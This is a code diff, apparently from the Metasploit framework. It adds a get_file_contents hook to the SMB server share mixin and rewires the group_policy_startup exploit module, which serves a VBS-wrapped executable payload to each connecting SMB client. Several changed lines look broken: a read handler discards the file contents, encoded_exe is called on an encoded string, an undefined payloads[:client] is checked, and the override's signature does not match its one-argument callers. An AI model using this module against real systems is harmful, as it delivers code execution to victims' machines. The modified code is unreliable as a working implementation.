Introduce get_file_contents

lib/msf/core/exploit/smb/server/share.rb

@@ -233,6 +233,18 @@ module Msf
         path
       end
 
+      # Returns the file contents for the requested file
+      #
+      # @param file [String] the requested file
+      # @param folder [String] the requested folder
+      # @return [String] The file contents.
+      # @note This method will be useful when multiple files are supported. At the
+      #   moment is used to be overriden by modules. So they can customize the file
+      #   contents.
+      def get_file_contents(client, file = '', folder = '')
+        file_contents
+      end
+
       # Builds the server address.
       #
       # @return [String] The server address.

lib/msf/core/exploit/smb/server/share/command/nt_create_andx.rb

@@ -26,7 +26,7 @@ module Msf
               payload = file_name
             end
 
-            contents = smb[:payload] || file_contents
+            contents = get_file_contents(c)
 
             if payload.ends_with?(file_name.downcase)
               vprint_status("SMB Share - #{smb[:ip]} SMB_COM_NT_CREATE_ANDX request for #{unc}... ")

lib/msf/core/exploit/smb/server/share/command/read_andx.rb

@@ -13,14 +13,13 @@ module Msf
           # @param buff [String] The data including the client request.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_read_andx(c, buff)
-            smb = @state[c]
             pkt = CONST::SMB_READ_PKT.make_struct
             pkt.from_s(buff)
 
             offset = pkt['Payload'].v['Offset']
             length = pkt['Payload'].v['MaxCountLow']
 
-            contents = smb[:payload] || file_contents
+            get_file_contents(c)
 
             send_read_andx_res(c, {
               data_len_low: length,

lib/msf/core/exploit/smb/server/share/information_level/find.rb

@@ -13,9 +13,7 @@ module Msf
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_find_file_both_directory_info(c, path)
-            smb = @state[c]
-
-            contents = smb[:payload] || file_contents
+            contents = get_file_contents(c)
 
             if path && path.include?(file_name.downcase)
               data = Rex::Text.to_unicode(file_name)
@@ -80,9 +78,7 @@ module Msf
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_find_file_full_directory_info(c, path)
-            smb = @state[c]
-
-            contents = smb[:payload] || file_contents
+            contents = get_file_contents(c)
 
             if path && path.include?(file_name.downcase)
               data = Rex::Text.to_unicode(file_name)

lib/msf/core/exploit/smb/server/share/information_level/query.rb

@@ -33,9 +33,7 @@ module Msf
           # @param fid [Fixnum] The file identifier which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_trans_query_file_info_standard(c, fid)
-            smb = @state[c]
-
-            contents = smb[:payload] || file_contents
+            contents = get_file_contents(c)
 
             send_info_standard_res(c, {
               allocation_size: 1048576,
@@ -73,9 +71,7 @@ module Msf
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_trans_query_path_info_standard(c, path)
-            smb = @state[c]
-
-            contents = smb[:payload] || file_contents
+            contents = get_file_contents(c)
 
             if path && path.include?(file_name.downcase)
               attrib = 0 # File attributes => file
@@ -103,9 +99,7 @@ module Msf
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_trans_query_path_info_network(c, path)
-            smb = @state[c]
-
-            contents = smb[:payload] || file_contents
+            contents = get_file_contents(c)
 
             if path && path.include?(file_name.downcase)
               attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL

modules/exploits/windows/smb/group_policy_startup.rb

@@ -63,21 +63,26 @@ class Metasploit3 < Msf::Exploit::Remote
   def setup
     super
     self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.vbs"
-    exe = payload.encoded_exe
+    p = payload.encoded
+    exe = p.encoded_exe
     self.file_contents = Msf::Util::EXE.to_exe_vbs(exe)
+    @custom_payloads = {}
     print_status("File available on #{unc}...")
   end
-=begin
+
   def on_client_connect(client)
     super(client)
 
-    smb = @state[client]
-
-    unless smb[:payload]
+    unless payloads[:client]
       p = regenerate_payload(client)
       exe = p.encoded_exe
-      smb[:payload] = Msf::Util::EXE.to_exe_vbs(exe)
+      @custom_payloads[client] = Msf::Util::EXE.to_exe_vbs(exe)
     end
   end
-=end
+
+  def get_file_contents(client, file, folder)
+    contents = @custom_payloads[client] || super(client, file, folder)
+
+    contents
+  end
 end